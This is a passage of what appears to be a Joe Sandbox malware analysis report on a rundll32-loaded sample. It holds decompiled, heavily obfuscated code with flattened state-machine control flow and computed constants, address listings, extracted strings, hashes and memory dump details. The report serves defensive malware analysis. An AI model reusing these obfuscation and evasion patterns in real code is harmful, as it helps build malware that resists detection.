								_t1144 = E00B33632(__eflags);
								__eflags = _t1144;
								if(__eflags == 0) {
									goto L112;
								} else {
									_t1225 = 0x3833d453;
									continue;
								}
							}
							if(_t1225 != 0x3544b2a) {
								break;
							} else {
								_t1144 = E00B31BDF();
								_t1225 = 0x371670b5;
								continue;
							}
							L54:
							__eflags = _t1225 - 0x2e6b2744;
							if(__eflags > 0) {
								__eflags = _t1225 - 0x35bdcd5f;
								if(__eflags > 0) {
									__eflags = _t1225 - 0x371670b5;
									if(_t1225 == 0x371670b5) {
										E00B38F49();
										_t1225 = 0x30491502;
										break;
									}
									__eflags = _t1225 - 0x376e2cde;
									if(__eflags == 0) {
										_v148 = E00B2F85D(_v472, __eflags,  &_v144, _v212, _v312, _v480);
										E00B248BD( &_v148, _v204, _v456, _v464);
										_t1387 = _t1387 + 0x18;
										_t1336 = _v148;
										E00B32025(_v304, _t1336, _v196, _v448);
										_t1225 = 0x13a2b08;
										continue;
									}
									__eflags = _t1225 - 0x37f9587b;
									if(__eflags == 0) {
										_v96 = 0x1346150;
										_t1225 = 0x2e6b2744;
										continue;
									}
									__eflags = _t1225 - 0x3833d453;
									if(_t1225 != 0x3833d453) {
										break;
									}
									_t1144 = E00B36014(); // executed
									_t1225 = 0x1e57e2ba;
									continue;
								}
								if(__eflags == 0) {
									_t1336 = _v320;
									_t1144 = E00B3A0AF(_v504, _t1336, _v512,  &_v88);
									_t1225 = 0x159448ba;
									continue;
								}
								__eflags = _t1225 - 0x30491502;
								if(_t1225 == 0x30491502) {
									_t1144 = E00B2EE78();
									__eflags = _t1144;
									if(__eflags == 0) {
										goto L112;
									}
									_t1225 = 0x2a91822d;
									continue;
								}
								__eflags = _t1225 - 0x3140af28;
								if(_t1225 == 0x3140af28) {
									_t1336 = _v228;
									_t1144 = E00B2F536(_v328, _t1336, _v336, _v88);
									goto L25;
								}
								__eflags = _t1225 - 0x326a8235;
								if(__eflags == 0) {
									_t1336 =  &_v124;
									_t1144 = E00B371EF(_t1336, __eflags, _v528);
									__eflags = _t1144;
									if(__eflags != 0) {
										asm("xorps xmm0, xmm0");
										asm("movlpd [esp+0x1d0], xmm0");
									}
									L95:
									_t1225 = 0x1653011b;
									continue;
								}
								__eflags = _t1225 - 0x356cf65c;
								if(_t1225 != 0x356cf65c) {
									break;
								}
								_t1144 = E00B367F0();
								_t1225 = 0x13c96655;
								continue;
							}
							if(__eflags == 0) {
								_v92 = 0x1388;
								_t1225 = 0x35bdcd5f;
								continue;
							}
							__eflags = _t1225 - 0x23233137;
							if(__eflags > 0) {
								__eflags = _t1225 - 0x2596cdc9;
								if(_t1225 == 0x2596cdc9) {
									_push(_v388);
									_push(_v584);
									_push(_v380);
									_t1336 = _v260;
									_push( &_v132);
									_push( &_v140);
									_t1172 = E00B29FDC(_t1336);
									_t1389 = _t1387 + 0x14;
									__eflags = _t1172;
									if(_t1172 == 0) {
										E00B2790F();
										E00B278A5(_t1225, _t1225, 0x1f40, _t1225, 0xfa0);
										_t1387 = _t1389 + 0x10;
										_t1144 = E00B28317();
										_t1225 = 0x21caf663;
										asm("adc ebx, 0x0");
									} else {
										_t1384 = 0x35bdcd5f;
										_t1213 = E00B278A5(_t1225, _t1225, 0xef420, _t1225, 0xdbba0);
										_t1387 = _t1389 + 0x10;
										_t1144 = E00B28317();
										_t1224 = _t1336;
										_t1348 = _t1144 + _t1213;
										_t1225 = 0x21c9d3c7;
										asm("adc ebx, 0x0");
									}
									while(1) {
										L1:
										goto L2;
									}
								}
								__eflags = _t1225 - 0x282d346f;
								if(_t1225 == 0x282d346f) {
									_t1384 = 0xd8c7d27;
									_t1186 = E00B278A5(_t1225, _t1225, 0x2ee0, _t1225, 0xfa0);
									_t1387 = _t1387 + 0x10;
									_t1144 = E00B28317();
									_t1224 = _t1336;
									_t1348 = _t1144 + _t1186;
									_t1225 = 0x23233137;
									asm("adc ebx, 0x0");
									goto L1;
								}
								__eflags = _t1225 - 0x288da576;
								if(_t1225 == 0x288da576) {
									_t1144 = E00B2F326();
									_v100 = _t1144;
									_t1225 = 0x37f9587b;
									continue;
								}
								__eflags = _t1225 - 0x2a91822d;
								if(_t1225 != 0x2a91822d) {
									break;
								}
								E00B33895();
								_t1144 = E00B27903();
								asm("sbb ecx, ecx");
								_t1225 = ( ~_t1144 & 0xdbd858d8) + 0x356cf65c;
								continue;
							}
							if(__eflags == 0) {
								_t1144 = _t1348 | _t1224;
								__eflags = _t1144;
								if(_t1144 != 0) {
									_t1199 = E00B278A5(_t1225, _t1225, 0x4b0, _t1225, 0x190);
									_t1387 = _t1387 + 8;
									_t1336 = _t1199;
									_t1144 = E00B33F62(_t1336, __eflags);
									__eflags = _t1144;
									if(__eflags != 0) {
										goto L28;
									}
									_t1144 = E00B28317();
									__eflags = _t1336 - _t1224;
									if(__eflags < 0) {
										L74:
										_t1225 = 0x23233137;
										break;
									}
									if(__eflags > 0) {
										goto L69;
									}
									__eflags = _t1144 - _t1348;
									if(_t1144 >= _t1348) {
										goto L69;
									}
									goto L74;
								}
								L69:
								_t1225 = _t1384;
								break;
							}
							__eflags = _t1225 - 0x1d55cf6f;
							if(_t1225 == 0x1d55cf6f) {
								_t1144 = E00B312E2();
								goto L112;
							}
							__eflags = _t1225 - 0x1e57e2ba;
							if(_t1225 == 0x1e57e2ba) {
								_t1144 = E00B34B41();
								__eflags = _t1144;
								if(_t1144 == 0) {
									goto L112;
								}
								_t1144 = E00B384C4(_v360);
								_t1225 = 0x1b19f75b;
								continue;
							}
							__eflags = _t1225 - 0x21c9d3c7;
							if(_t1225 == 0x21c9d3c7) {
								_t1336 = _v524;
								_t1144 = E00B33FE7( &_v124, _t1336, _v240,  &_v140);
								__eflags = _t1144;
								if(__eflags == 0) {
									goto L95;
								}
								_t1144 = E00B367E9();
								__eflags = _v116;
								_t1225 = 0x10f69b27;
								if(__eflags != 0) {
									__eflags = _v116 - 7;
									_t1225 =  ==  ? 0x1d55cf6f : 0x10f69b27;
								}
								continue;
							}
							__eflags = _t1225 - 0x21caf663;
							if(_t1225 != 0x21caf663) {
								break;
							}
							_t1336 = _v444;
							_t1144 = E00B2F536(_v368, _t1336, _v532, _v132);
							_t1225 = 0x7ff6f9b;
						}
						__eflags = _t1225 - 0x3adf5394;
					} while (__eflags != 0);
					goto L112;
				}
			}

0x00b22c69
0x00b22c6f
0x00b22c7d
0x00b22c88
0x00b22c8d
0x00b22c97
0x00b22c9c
0x00b22ca2
0x00b22ca7
0x00b22caf
0x00b22cba
0x00b22ccd
0x00b22cd0
0x00b22cd7
0x00b22ce2
0x00b22ced
0x00b22cf8
0x00b22d0e
0x00b22d15
0x00b22d20
0x00b22d2b
0x00b22d3a
0x00b22d3f
0x00b22d48
0x00b22d50
0x00b22d5b
0x00b22d66
0x00b22d6e
0x00b22d79
0x00b22d8b
0x00b22d8e
0x00b22d9d
0x00b22da4
0x00b22daf
0x00b22dc2
0x00b22dc9
0x00b22dd4
0x00b22ddf
0x00b22dea
0x00b22df5
0x00b22e00
0x00b22e0b
0x00b22e16
0x00b22e21
0x00b22e2c
0x00b22e34
0x00b22e3f
0x00b22e4a
0x00b22e55
0x00b22e5d
0x00b22e68
0x00b22e73
0x00b22e7e
0x00b22e89
0x00b22e94
0x00b22e9f
0x00b22eac
0x00b22eb7
0x00b22ec2
0x00b22ecd
0x00b22ed8
0x00b22ee3
0x00b22eee
0x00b22ef9
0x00b22f01
0x00b22f0c
0x00b22f17
0x00b22f2c
0x00b22f2f
0x00b22f30
0x00b22f37
0x00b22f42
0x00b22f4d
0x00b22f58
0x00b22f6e
0x00b22f75
0x00b22f80
0x00b22f8b
0x00b22f96
0x00b22fa1
0x00b22fac
0x00b22fb7
0x00b22fbf
0x00b22fca
0x00b22fd2
0x00b22fda
0x00b22fdf
0x00b22fe7
0x00b22fef
0x00b22ffa
0x00b23005
0x00b23010
0x00b23025
0x00b2302c
0x00b23037
0x00b23042
0x00b2304d
0x00b23058
0x00b23063
0x00b23076
0x00b2307d
0x00b23088
0x00b23093
0x00b2309e
0x00b230a9
0x00b230b4
0x00b230c6
0x00b230c9
0x00b230d0
0x00b230db
0x00b230e6
0x00b230f3
0x00b230f7
0x00b230ff
0x00b23104
0x00b2310c
0x00b23117
0x00b23122
0x00b2312d
0x00b23138
0x00b2314b
0x00b23154
0x00b2315f
0x00b23167
0x00b2316f
0x00b23177
0x00b2317c
0x00b23184
0x00b23192
0x00b23197
0x00b231a1
0x00b231a4
0x00b231ad
0x00b231b1
0x00b231b9
0x00b231cc
0x00b231d3
0x00b231de
0x00b231e9
0x00b231f4
0x00b231ff
0x00b23207
0x00b23212
0x00b2321d
0x00b23228
0x00b23230
0x00b2323b
0x00b23246
0x00b23251
0x00b2325c
0x00b23267
0x00b23272
0x00b2327a
0x00b23285
0x00b23290
0x00b23298
0x00b232a3
0x00b232ab
0x00b232b6
0x00b232c1
0x00b232c9
0x00b232d4
0x00b232df
0x00b232ea
0x00b232f5
0x00b23300
0x00b2330b
0x00b23316
0x00b2331e
0x00b23329
0x00b23334
0x00b23347
0x00b2334e
0x00b23359
0x00b23364
0x00b2336f
0x00b2337a
0x00b23385
0x00b23390
0x00b2339b
0x00b233a6
0x00b233ae
0x00b233b9
0x00b233c1
0x00b233ce
0x00b233d2
0x00b233da
0x00b233e2
0x00b233ed
0x00b233f5
0x00b23402
0x00b2340d
0x00b23418
0x00b23423
0x00b2342e
0x00b23439
0x00b23444
0x00b2344f
0x00b23457
0x00b23465
0x00b2346a
0x00b23470
0x00b23474
0x00b2347c
0x00b23487
0x00b23492
0x00b2349d
0x00b234a8
0x00b234b3
0x00b234bb
0x00b234c3
0x00b234c8
0x00b234d0
0x00b234db
0x00b234e6
0x00b234f1
0x00b234fc
0x00b2350e
0x00b23513
0x00b2351c
0x00b23527
0x00b23532
0x00b2353d
0x00b23548
0x00b23550
0x00b2355b
0x00b23566
0x00b23571
0x00b2357c
0x00b23587
0x00b2358f
0x00b2359a
0x00b235a2
0x00b235af
0x00b235b0
0x00b235b4
0x00b235bc
0x00b235c4
0x00b235cf
0x00b235da
0x00b235e5
0x00b235f0
0x00b235fb
0x00b23606
0x00b23611
0x00b23619
0x00b2361e
0x00b23626
0x00b2362b
0x00b23633
0x00b23647
0x00b2364e
0x00b23656
0x00b23661
0x00b23669
0x00b23679
0x00b2367e
0x00b23684
0x00b2368c
0x00b23699
0x00b2369c
0x00b236a0
0x00b236a8
0x00b236b0
0x00b236b8
0x00b236c3
0x00b236ce
0x00b236d9
0x00b236e4
0x00b236ef
0x00b236f7
0x00b23702
0x00b2370d
0x00b23723
0x00b2372a
0x00b23735
0x00b23740
0x00b2374d
0x00b23750
0x00b2375c
0x00b23760
0x00b23765
0x00b2376d
0x00b23778
0x00b23780
0x00b2378b
0x00b2379e
0x00b2379f
0x00b237a6
0x00b237ae
0x00b237b9
0x00b237c1
0x00b237c6
0x00b237cb
0x00b237d0
0x00b237d8
0x00b237e3
0x00b237f6
0x00b237fd
0x00b23808
0x00b23810
0x00b23818
0x00b2381d
0x00b23822
0x00b2382a
0x00b2383d
0x00b2384d
0x00b23854
0x00b2385f
0x00b2386a
0x00b23875
0x00b2387d
0x00b23888
0x00b23890
0x00b2389d
0x00b238a1
0x00b238a9
0x00b238b3
0x00b238be
0x00b238c9
0x00b238d1
0x00b238dc
0x00b238e4
0x00b238e9
0x00b238f1
0x00b238f9
0x00b23901
0x00b2390c
0x00b23917
0x00b23922
0x00b2392d
0x00b23938
0x00b23940
0x00b2394b
0x00b23953
0x00b23958
0x00b23960
0x00b23965
0x00b2396d
0x00b23978
0x00b23980
0x00b2398b
0x00b23993
0x00b2399b
0x00b239a9
0x00b239ae
0x00b239b4
0x00b239bc
0x00b239c4
0x00b239c9
0x00b239d1
0x00b239d9
0x00b239e1
0x00b239f4
0x00b239f7
0x00b239fe
0x00b23a09
0x00b23a14
0x00b23a1f
0x00b23a2a
0x00b23a35
0x00b23a3d
0x00b23a48
0x00b23a53
0x00b23a5e
0x00b23a74
0x00b23a82
0x00b23a87
0x00b23a90
0x00b23a9b
0x00b23aa6
0x00b23ab1
0x00b23abc
0x00b23ac8
0x00b23acb
0x00b23acf
0x00b23adc
0x00b23ae0
0x00b23ae8
0x00b23b00
0x00b23b09
0x00b23b14
0x00b23b1f
0x00b23b2a
0x00b23b35
0x00b23b40
0x00b23b53
0x00b23b54
0x00b23b5b
0x00b23b63
0x00b23b6e
0x00b23b81
0x00b23b90
0x00b23b97
0x00b23ba2
0x00b23bad
0x00b23bc1
0x00b23bd0
0x00b23bd7
0x00b23be2
0x00b23bef
0x00b23bf3
0x00b23bfd
0x00b23c01
0x00b23c09
0x00b23c11
0x00b23c16
0x00b23c1e
0x00b23c26
0x00b23c2e
0x00b23c41
0x00b23c48
0x00b23c53
0x00b23c5e
0x00b23c69
0x00b23c71
0x00b23c79
0x00b23c7e
0x00b23c86
0x00b23c8e
0x00b23c99
0x00b23ca4
0x00b23caf
0x00b23cba
0x00b23cc5
0x00b23ccd
0x00b23cd8
0x00b23ce3
0x00b23ceb
0x00b23cf6
0x00b23d01
0x00b23d14
0x00b23d23
0x00b23d2a
0x00b23d32
0x00b23d3d
0x00b23d48
0x00b23d50
0x00b23d5b
0x00b23d66
0x00b23d6e
0x00b23d7b
0x00b23d8f
0x00b23d9b
0x00b23da2
0x00b23dad
0x00b23db8
0x00b23dc3
0x00b23dce
0x00b23dd9
0x00b23de4
0x00b23df9
0x00b23e01
0x00b23e08
0x00b23e13
0x00b23e2a
0x00b23e2e
0x00b23e36
0x00b23e3b
0x00b23e43
0x00b23e56
0x00b23e65
0x00b23e6c
0x00b23e77
0x00b23e7f
0x00b23e87
0x00b23e8f
0x00b23e97
0x00b23e9f
0x00b23eaa
0x00b23eb2
0x00b23ec6
0x00b23ecd
0x00b23ed8
0x00b23ee3
0x00b23ef6
0x00b23efd
0x00b23f08
0x00b23f08
0x00b23f0d
0x00b23f0d
0x00b23f0d
0x00b23f0d
0x00b23f13
0x00b23f13
0x00b23f19
0x00b23f19
0x00b24295
0x00b24297
0x00b242cb
0x00b242d4
0x00b242dc
0x00b23f0d
0x00b23f0d
0x00b23f0d
0x00b23f13
0x00b23f13
0x00000000
0x00b23f13
0x00b23f0d
0x00b242a7
0x00b242b0
0x00b242b2
0x00b2411e
0x00b2411e
0x00b23f0d
0x00b23f0d
0x00b23f0d
0x00b23f13
0x00b23f13
0x00000000
0x00b23f13
0x00000000
0x00b23f0d
0x00b23f1f
0x00b23f25
0x00b24129
0x00b2412f
0x00b241a9
0x00b241af
0x00b24278
0x00b2427f
0x00000000
0x00b2427f
0x00b241b5
0x00b241bb
0x00b2424e
0x00b24255
0x00000000
0x00b24255
0x00b241bd
0x00b241c3
0x00b24214
0x00b2421f
0x00b24227
0x00000000
0x00b24227
0x00b241c5
0x00b241cb
0x00000000
0x00000000
0x00b241df
0x00b241e8
0x00b241f0
0x00000000
0x00b241f0
0x00b24131
0x00b24837
0x00b24851
0x00b24858
0x00b24858
0x00b24137
0x00b2413d
0x00b2419a
0x00b2419f
0x00000000
0x00b2419f
0x00b2413f
0x00b24145
0x00b24184
0x00b24189
0x00000000
0x00b24189
0x00b24147
0x00b2414d
0x00b2416c
0x00000000
0x00b2416c
0x00b2414f
0x00b24155
0x00000000
0x00000000
0x00b24162
0x00000000
0x00b24162
0x00b23f2b
0x00b2410d
0x00b24116
0x00b24118
0x00b24118
0x00000000
0x00b24118
0x00b23f31
0x00b23f37
0x00b23ffd
0x00b24003
0x00b240ea
0x00b240f5
0x00b240fc
0x00000000
0x00b240fc
0x00b24009
0x00b2400f
0x00b240c9
0x00b240ce
0x00b240d5
0x00000000
0x00b240d5
0x00b24015
0x00b2401b
0x00b2405c
0x00b24069
0x00b24074
0x00b24079
0x00b2407c
0x00b2407e
0x00b240b4
0x00b240b4
0x00000000
0x00b240b4
0x00b24080
0x00b24096
0x00b2409d
0x00b240a3
0x00b240aa
0x00000000
0x00b240aa
0x00b2401d
0x00b24023
0x00000000
0x00000000
0x00b24034
0x00b24042
0x00b2404b
0x00b2404b
0x00000000
0x00b2404b
0x00b23f3d
0x00b23fee
0x00b23ff3
0x00000000
0x00b23ff3
0x00b23f49
0x00b23fdd
0x00000000
0x00b23fdd
0x00b23f55
0x00b23fc7
0x00b23fcc
0x00b23fd3
0x00000000
0x00b23fd3
0x00b23f5d
0x00b23faf
0x00000000
0x00b23faf
0x00b23f65
0x00b23f98
0x00b23f9d
0x00b23f9f
0x00000000
0x00b23fa5
0x00b23fa5
0x00000000
0x00b23fa5
0x00b23f9f
0x00b23f6d
0x00000000
0x00b23f73
0x00b23f81
0x00b23f86
0x00000000
0x00b23f86
0x00b242e7
0x00b242e7
0x00b242ed
0x00b24632
0x00b24638
0x00b24736
0x00b2473c
0x00b24818
0x00b2481d
0x00000000
0x00b2481d
0x00b24742
0x00b24748
0x00b247b9
0x00b247dc
0x00b247e1
0x00b247f2
0x00b24800
0x00b24807
0x00000000
0x00b24807
0x00b2474a
0x00b24750
0x00b24778
0x00b24783
0x00000000
0x00b24783
0x00b24752
0x00b24758
0x00000000
0x00000000
0x00b24769
0x00b2476e
0x00000000
0x00b2476e
0x00b2463e
0x00b2471a
0x00b24725
0x00b2472c
0x00000000
0x00b2472c
0x00b24644
0x00b2464a
0x00b246f7
0x00b246fc
0x00b246fe
0x00000000
0x00000000
0x00b24704
0x00000000
0x00b24704
0x00b24650
0x00b24656
0x00b246d2
0x00b246e0
0x00000000
0x00b246e6
0x00b24658
0x00b2465e
0x00b2468a
0x00b24691
0x00b24697
0x00b24699
0x00b2469b
0x00b246a3
0x00b246b3
0x00b246ba
0x00b246ba
0x00000000
0x00b246ba
0x00b24660
0x00b24666
0x00000000
0x00000000
0x00b24670
0x00b24675
0x00000000
0x00b24675
0x00b242f3
0x00b2461d
0x00b24628
0x00000000
0x00b24628
0x00b242f9
0x00b242ff
0x00b24463
0x00b24469
0x00b2453f
0x00b2454d
0x00b24551
0x00b24558
0x00b2455f
0x00b24567
0x00b24568
0x00b2456d
0x00b24570
0x00b24572
0x00b245c8
0x00b245fb
0x00b24600
0x00b24605
0x00b24610
0x00b24615
0x00b24574
0x00b24578
0x00b245a2
0x00b245a7
0x00b245ac
0x00b245b3
0x00b245b5
0x00b245b7
0x00b245bc
0x00b245bc
0x00b23f08
0x00b23f08
0x00000000
0x00b23f08
0x00b23f08
0x00b2446f
0x00b24475
0x00b244f3
0x00b2451d
0x00b24522
0x00b24527
0x00b2452e
0x00b24530
0x00b24532
0x00b24537
0x00000000
0x00b24537
0x00b24477
0x00b2447d
0x00b244d6
0x00b244db
0x00b244e2
0x00000000
0x00b244e2
0x00b2447f
0x00b24485
0x00000000
0x00000000
0x00b24499
0x00b244ac
0x00b244b5
0x00b244bd
0x00000000
0x00b244bd
0x00b24305
0x00b243e8
0x00b243e8
0x00b243ea
0x00b2441b
0x00b24427
0x00b2442e
0x00b24437
0x00b2443e
0x00b24440
0x00000000
0x00000000
0x00b2444a
0x00b2444f
0x00b24451
0x00b24459
0x00b24459
0x00000000
0x00b24459
0x00b24453
0x00000000
0x00000000
0x00b24455
0x00b24457
0x00000000
0x00000000
0x00000000
0x00b24457
0x00b243ec
0x00b243ec
0x00000000
0x00b243ec
0x00b2430b
0x00b2430d
0x00b2484c
0x00000000
0x00b2484c
0x00b24313
0x00b24319
0x00b243c3
0x00b243c8
0x00b243ca
0x00000000
0x00000000
0x00b243d7
0x00b243dc
0x00000000
0x00b243dc
0x00b2431f
0x00b24325
0x00b2436c
0x00b24377
0x00b2437e
0x00b24380
0x00000000
0x00000000
0x00b24394
0x00b24399
0x00b243a1
0x00b243a6
0x00b243ac
0x00b243b4
0x00b243b4
0x00000000
0x00b243a6
0x00b24327
0x00b2432d
0x00000000
0x00000000
0x00b2433e
0x00b2434c
0x00b24353
0x00b24353
0x00b24822
0x00b24822
0x00000000
0x00b2482e

Strings

bY, xrefs: 00B232DF
nlvJ, xrefs: 00B235B4
71##, xrefs: 00B24532
71##, xrefs: 00B24459
D'k., xrefs: 00B24783
T5W, xrefs: 00B23C53
I], xrefs: 00B2378B
o, xrefs: 00B22E21
QG)}, xrefs: 00B2316F
G", xrefs: 00B23A2A
u, xrefs: 00B23D3D
P&, xrefs: 00B22ED8
D>, xrefs: 00B239E1
yI, xrefs: 00B23251
71##, xrefs: 00B2404B
o4-(, xrefs: 00B2446F
71##, xrefs: 00B242F9
nY, xrefs: 00B23ABC
d3, xrefs: 00B2347C
[ , xrefs: 00B22E3F
0vkX, xrefs: 00B22EEE
}%, xrefs: 00B239D9
k, xrefs: 00B23246
7Y, xrefs: 00B2340D
ny, xrefs: 00B23B6E
);, xrefs: 00B23DA2
FM, xrefs: 00B23E77
C!), xrefs: 00B238BE
+!, xrefs: 00B23B63
\$, xrefs: 00B23ED8
D'k., xrefs: 00B242E7
;R,], xrefs: 00B235E5
q, xrefs: 00B237D8
=, xrefs: 00B233B9
DP, xrefs: 00B23CD8
c, xrefs: 00B23CBA
o4-(, xrefs: 00B23FDD
~, xrefs: 00B23633
n\, xrefs: 00B23C8E
jd, xrefs: 00B23184
=<, xrefs: 00B22D79
,Bb*, xrefs: 00B23C7E
kU, xrefs: 00B234E6

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: );$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
API String ID: 0-1872862241
Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction ID: 402a446532b3c8fb9eead221cece248f8d51ae16b10433d82cfa20530cfa49bc
Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction Fuzzy Hash: CFD203715093818BD378CF25D58ABDFBBE1BB84704F10895DE19E8A2A0DBB49949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B34B41, Relevance: 15.2, Strings: 12, Instructions: 226
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00B34B41() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _t200;
				signed int _t202;
				signed int _t206;
				void* _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;
				signed int _t216;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				signed int* _t247;
				void* _t249;

				_t247 =  &_v592;
				_v592 = 0xe399;
				_v592 = _v592 << 2;
				_t214 = 0xf501058;
				_v592 = _v592 << 0xe;
				_v592 = _v592 ^ 0xe399001c;
				_v588 = 0x8f0f;
				_v588 = _v588 * 0x29;
				_t245 = 0;
				_v588 = _v588 ^ 0x0016e94e;
				_v568 = 0x725;
				_t239 = 0x36;
				_v568 = _v568 / _t239;
				_t240 = 0xc;
				_v568 = _v568 * 0x63;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x000ca091;
				_v532 = 0x951;
				_v532 = _v532 << 7;
				_v532 = _v532 ^ 0x0004989a;
				_v524 = 0x2ad;
				_v524 = _v524 | 0xf8213247;
				_v524 = _v524 ^ 0xf82150c2;
				_v548 = 0x8830;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 ^ 0x00006238;
				_v588 = 0xba20;
				_v588 = _v588 | 0x721cc32f;
				_v588 = _v588 ^ 0x721c8c06;
				_v580 = 0x8092;
				_v580 = _v580 + 0xfffffe56;
				_v580 = _v580 / _t240;
				_v580 = _v580 >> 3;
				_v580 = _v580 ^ 0x000005b6;
				_v540 = 0xe99f;
				_v540 = _v540 + 0xfffff8d3;
				_v540 = _v540 | 0x984d7063;
				_v540 = _v540 ^ 0x984d8ec7;
				_v556 = 0xc4eb;
				_t241 = 0x4e;
				_v556 = _v556 * 0x5c;
				_v556 = _v556 + 0x75ac;
				_v556 = _v556 ^ 0x00477921;
				_v536 = 0x9b3b;
				_v536 = _v536 + 0xaa1d;
				_v536 = _v536 ^ 0x00012776;
				_v572 = 0x8e84;
				_v572 = _v572 * 0x29;
				_v572 = _v572 / _t241;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x000020e9;
				_v528 = 0xcb2d;
				_t242 = 0x21;
				_v528 = _v528 / _t242;
				_v528 = _v528 ^ 0x00001b4e;
				_v544 = 0x6df7;
				_v544 = _v544 ^ 0x414c8853;
				_t243 = 0x49;
				_v544 = _v544 * 0x75;
				_v544 = _v544 ^ 0xd824a1d7;
				_v552 = 0xc4f0;
				_v552 = _v552 ^ 0x9d070a5f;
				_v552 = _v552 + 0xffff498d;
				_v552 = _v552 ^ 0x9d0763b6;
				_v564 = 0xe384;
				_v564 = _v564 ^ 0xde12aa62;
				_v564 = _v564 | 0x2c019ae9;
				_v564 = _v564 ^ 0xa4e5f9a5;
				_v564 = _v564 ^ 0x5af67a61;
				_v576 = 0x7d9f;
				_v576 = _v576 + 0x6134;
				_v576 = _v576 | 0x6ccc595a;
				_v576 = _v576 ^ 0x0058e7ee;
				_v576 = _v576 ^ 0x6c9448a2;
				_v592 = 0x396f;
				_v592 = _v592 * 7;
				_v592 = _v592 ^ 0x10cc7cbf;
				_v592 = _v592 ^ 0x10cdfb96;
				_v560 = 0x3078;
				_v560 = _v560 << 8;
				_t244 = _v588;
				_v560 = _v560 / _t243;
				_v560 = _v560 + 0xffff6a19;
				_v560 = _v560 ^ 0x000f142e;
				goto L1;
				do {
					while(1) {
						L1:
						_t249 = _t214 - 0x3227b83a;
						if(_t249 > 0) {
							break;
						}
						if(_t249 == 0) {
							_v584 = 0xc457;
							_v584 = _v584 >> 6;
							_t165 =  &_v584;
							 *_t165 = _v584 ^ 0x0000030d;
							__eflags =  *_t165;
							_t202 =  *0xb3ca2c; // 0x505cc8
							 *((intOrPtr*)(_t202 + 0x218)) = E00B37CC2;
							L13:
							_t214 = 0x2ded9275;
							continue;
						}
						if(_t214 == 0xf501058) {
							_push(_t214);
							_push(_t214);
							_t206 = E00B28736(0x454); // executed
							 *0xb3ca2c = _t206;
							__eflags = _t206;
							if(_t206 == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t206 + 0x214)) = E00B320C5;
							_t214 = 0x382146c2;
							continue;
						}
						if(_t214 == 0x204dd1d9) {
							E00B2B112();
							_t214 = 0x354eaa90;
							continue;
						}
						if(_t214 == 0x24baa30b) {
							_v584 = 0xe62c;
							_t214 = 0x36e33d60;
							_v584 = _v584 ^ 0x84d80cbd;
							_v584 = _v584 ^ 0x84d8eab8;
							continue;
						}
						if(_t214 != 0x2ded9275) {
							goto L22;
						}
						_push(_t214);
						_push(_t214);
						E00B2C6C7(_v536, _v572,  *0xb3ca2c, _t214, _v528, _v584, _v544); // executed
						_t247 =  &(_t247[7]);
						_t214 = 0x204dd1d9;
						_t210 = 1;
						_t245 =  ==  ? _t210 : _t245;
					}
					__eflags = _t214 - 0x354eaa90;
					if(__eflags == 0) {
						E00B33E3F(_t214,  &_v520, __eflags, _v552, _v564);
						_t200 = E00B2E29C(_v576, _v592,  &_v520);
						_t216 =  *0xb3ca2c; // 0x505cc8
						_t247 =  &(_t247[3]);
						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
						_t214 = 0xae4e76a;
						goto L22;
					}
					__eflags = _t214 - 0x36e33d60;
					if(_t214 == 0x36e33d60) {
						E00B25FB2(_v540, _v556, _t244); // executed
						goto L13;
					}
					__eflags = _t214 - 0x382146c2;
					if(_t214 != 0x382146c2) {
						goto L22;
					}
					_t211 = E00B22959(_t214, _v548, _v588, _v580, _v560); // executed
					_t244 = _t211;
					_t247 =  &(_t247[4]);
					__eflags = _t244;
					if(_t244 == 0) {
						_t214 = 0x3227b83a;
					} else {
						_t212 =  *0xb3ca2c; // 0x505cc8
						 *((intOrPtr*)(_t212 + 0x224)) = 1;
						_t214 = 0x24baa30b;
					}
					goto L1;
					L22:
					__eflags = _t214 - 0xae4e76a;
				} while (_t214 != 0xae4e76a);
				L23:
				return _t245;
			}

0x00b34b41
0x00b34b47
0x00b34b50
0x00b34b54
0x00b34b59
0x00b34b5d
0x00b34b64
0x00b34b75
0x00b34b79
0x00b34b7b
0x00b34b83
0x00b34b91
0x00b34b96
0x00b34ba1
0x00b34ba4
0x00b34ba8
0x00b34bad
0x00b34bb5
0x00b34bbd
0x00b34bc2
0x00b34bca
0x00b34bd2
0x00b34bda
0x00b34be2
0x00b34bea
0x00b34bef
0x00b34bf4
0x00b34bfc
0x00b34c04
0x00b34c0c
0x00b34c14
0x00b34c1c
0x00b34c2c
0x00b34c30
0x00b34c35
0x00b34c3d
0x00b34c45
0x00b34c4d
0x00b34c55
0x00b34c5d
0x00b34c6a
0x00b34c6d
0x00b34c71
0x00b34c79
0x00b34c81
0x00b34c89
0x00b34c91
0x00b34c99
0x00b34ca6
0x00b34cb2
0x00b34cb6
0x00b34cbb
